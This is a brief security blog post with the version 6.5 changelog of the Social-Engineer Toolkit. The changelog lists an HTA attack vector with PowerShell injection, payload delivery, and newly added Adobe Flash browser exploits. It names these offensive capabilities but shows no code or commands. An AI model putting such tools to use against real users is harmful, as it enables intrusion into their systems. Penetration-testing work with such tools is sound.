Additionally, SET added a lot of new exploits including the Hacking Team Adobe zero-day, and others from Metasploit.

Full changelog below:
~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added brand new attack vector HTA attack and incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in certain attack vectors
* slimmed down powershell injection http/https attack vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
* added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
* added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)

Supported platforms
  • Linux
  • Windows (experimental)

Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community